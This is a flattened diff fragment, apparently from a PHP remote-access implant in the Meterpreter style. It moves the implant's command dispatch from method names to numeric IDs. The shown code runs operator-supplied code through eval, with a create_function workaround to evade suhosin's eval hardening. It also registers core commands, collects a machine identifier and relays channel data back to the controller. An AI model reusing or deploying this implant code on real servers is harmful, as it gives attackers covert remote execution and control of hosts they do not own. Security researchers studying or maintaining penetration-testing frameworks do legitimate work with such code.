if (($data_tlv['type'] & TLV_META_TYPE_COMPRESSED) == TLV_META_TYPE_COMPRESSED) {
return ERROR_FAILURE;
}
$tmp = $commands;
$tmp = $id2f;
# We might not be able to use `eval` here because of some hardening
# (for example, suhosin), so we walk around by using `create_function` instead,
# but since this function is deprecated since php 7.2+, we're not using it
# but since this funcis deprecated since php 7.2+, we're not using it
# when we can avoid it, since it might leave some traces in the log files.
if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) {
$suhosin_bypass=create_function('', $data_tlv['value']);
@ -433,33 +496,41 @@ function core_loadlib($req, &$pkt) {
} else {
eval($data_tlv['value']);
}
$new = array_diff($commands, $tmp);
foreach ($new as $meth) {
packet_add_tlv($pkt, create_tlv(TLV_TYPE_METHOD, $meth));
$new = array_diff($id2f, $tmp);
foreach ($new as $id => $func) {
packet_add_tlv($pkt, create_tlv(TLV_TYPE_UINT, $id));
}
return ERROR_SUCCESS;
}
}
function core_enumextcmd($req, &$pkt) {
if (!function_exists('core_enumextcmd')) {
register_command('core_enumextcmd', COMMAND_ID_CORE_ENUMEXTCMD);
function core_enumextcmd($req, &$pkt) {
my_print("doing core_enumextcmd");
global $commands;
global $id2f;
$extension_name_tlv = packet_get_tlv($req, TLV_TYPE_STRING);;
$expected_ext_name = $extension_name_tlv['value'];
foreach ($commands as $ext_cmd) {
foreach ($id2f as $id => $ext_cmd) {
my_print("core_enumextcmd - checking " . $ext_cmd . " as " . $id);
list($ext_name, $cmd) = explode("_", $ext_cmd, 2);
if ($ext_name == $expected_ext_name) {
packet_add_tlv($pkt, create_tlv(TLV_TYPE_STRING, $cmd));
my_print("core_enumextcmd - adding " . $ext_cmd . " as " . $id);
packet_add_tlv($pkt, create_tlv(TLV_TYPE_UINT, $id));
}
}
return ERROR_SUCCESS;
}
}
function core_set_uuid($req, &$pkt) {
if (!function_exists('core_set_uuid')) {
register_command('core_set_uuid', COMMAND_ID_CORE_SET_UUID);
function core_set_uuid($req, &$pkt) {
my_print("doing core_set_uuid");
$new_uuid = packet_get_tlv($req, TLV_TYPE_UUID);
if ($new_uuid != null) {
@ -467,6 +538,7 @@ function core_set_uuid($req, &$pkt) {
my_print("New UUID is {$GLOBALS['UUID']}");
}
return ERROR_SUCCESS;
}
}
@ -481,7 +553,9 @@ function get_hdd_label() {
return "";
}
function core_negotiate_tlv_encryption($req, &$pkt) {
if (!function_exists('core_negotiate_tlv_encryption')) {
register_command('core_negotiate_tlv_encryption', COMMAND_ID_CORE_NEGOTIATE_TLV_ENCRYPTION);
function core_negotiate_tlv_encryption($req, &$pkt) {
if (supports_aes()) {
my_print("AES functionality is supported");
packet_add_tlv($pkt, create_tlv(TLV_TYPE_SYM_KEY_TYPE, ENC_AES256));
@ -503,14 +577,20 @@ function core_negotiate_tlv_encryption($req, &$pkt) {
packet_add_tlv($pkt, create_tlv(TLV_TYPE_SYM_KEY, $GLOBALS['AES_KEY']));
}
return ERROR_SUCCESS;
}
}
function core_get_session_guid($req, &$pkt) {
if (!function_exists('core_get_session_guid')) {
register_command('core_get_session_guid', COMMAND_ID_CORE_GET_SESSION_GUID);
function core_get_session_guid($req, &$pkt) {
packet_add_tlv($pkt, create_tlv(TLV_TYPE_SESSION_GUID, $GLOBALS['SESSION_GUID']));
return ERROR_SUCCESS;
}
}
function core_set_session_guid($req, &$pkt) {
if (!function_exists('core_set_session_guid')) {
register_command('core_set_session_guid', COMMAND_ID_CORE_SET_SESSION_GUID);
function core_set_session_guid($req, &$pkt) {
my_print("doing core_set_session_guid");
$new_guid = packet_get_tlv($req, TLV_TYPE_SESSION_GUID);
if ($new_guid != null) {
@ -518,9 +598,12 @@ function core_set_session_guid($req, &$pkt) {
my_print("New Session GUID is {$GLOBALS['SESSION_GUID']}");
}
return ERROR_SUCCESS;
}
}
function core_machine_id($req, &$pkt) {
if (!function_exists('core_machine_id')) {
register_command('core_machine_id', COMMAND_ID_CORE_MACHINE_ID);
function core_machine_id($req, &$pkt) {
my_print("doing core_machine_id");
if (is_callable('gethostname')) {
# introduced in 5.3
@ -541,12 +624,13 @@ function core_machine_id($req, &$pkt) {
packet_add_tlv($pkt, create_tlv(TLV_TYPE_MACHINE_ID, $serial.":".$machine_id));
return ERROR_SUCCESS;
}
##
# Channel Helper Functions
##
}
##
# Channel Helper Functions
##
$channels = array();
function register_channel($in, $out=null, $err=null) {
@ -769,7 +853,7 @@ function handle_dead_resource_channel($resource) {
# Notify the client that this channel is dead
$pkt = pack("N", PACKET_TYPE_REQUEST);
packet_add_tlv($pkt, create_tlv(TLV_TYPE_METHOD, 'core_channel_close'));
packet_add_tlv($pkt, create_tlv(TLV_TYPE_COMMAND_ID, 'core_channel_close'));
packet_add_tlv($pkt, create_tlv(TLV_TYPE_REQUEST_ID, generate_req_id()));
packet_add_tlv($pkt, create_tlv(TLV_TYPE_CHANNEL_ID, $cid));
packet_add_tlv($pkt, create_tlv(TLV_TYPE_UUID, $GLOBALS['UUID']));
@ -787,7 +871,7 @@ function handle_resource_read_channel($resource, $data) {
# Build a new Packet
$pkt = pack("N", PACKET_TYPE_REQUEST);
packet_add_tlv($pkt, create_tlv(TLV_TYPE_METHOD, 'core_channel_write'));
packet_add_tlv($pkt, create_tlv(TLV_TYPE_COMMAND_ID, 'core_channel_write'));
if (array_key_exists((int)$resource, $udp_host_map)) {
list($h,$p) = $udp_host_map[(int)$resource];
packet_add_tlv($pkt, create_tlv(TLV_TYPE_PEER_HOST, $h));
@ -805,19 +889,21 @@ function handle_resource_read_channel($resource, $data) {
}
function create_response($req) {
global $id2f;
$pkt = pack("N", PACKET_TYPE_RESPONSE);
$method_tlv = packet_get_tlv($req, TLV_TYPE_METHOD);
my_print("method is {$method_tlv['value']}");
packet_add_tlv($pkt, $method_tlv);
$command_id_tlv = packet_get_tlv($req, TLV_TYPE_COMMAND_ID);
my_print("command id is {$command_id_tlv['value']}");
packet_add_tlv($pkt, $command_id_tlv);
$reqid_tlv = packet_get_tlv($req, TLV_TYPE_REQUEST_ID);
packet_add_tlv($pkt, $reqid_tlv);
if (is_callable($method_tlv['value'])) {
$result = $method_tlv['value']($req, $pkt);
$command_handler = $id2f[$command_id_tlv['value']];
if (is_callable($command_handler)) {
$result = $command_handler($req, $pkt);
} else {
my_print("Got a request for something I don't know how to handle (". $method_tlv['value'] ."), returning failure");
my_print("Got a request for something I don't know how to handle (" . $command_id_tlv['value'] . " / ". $command_handler ."), returning failure");
$result = ERROR_FAILURE;
}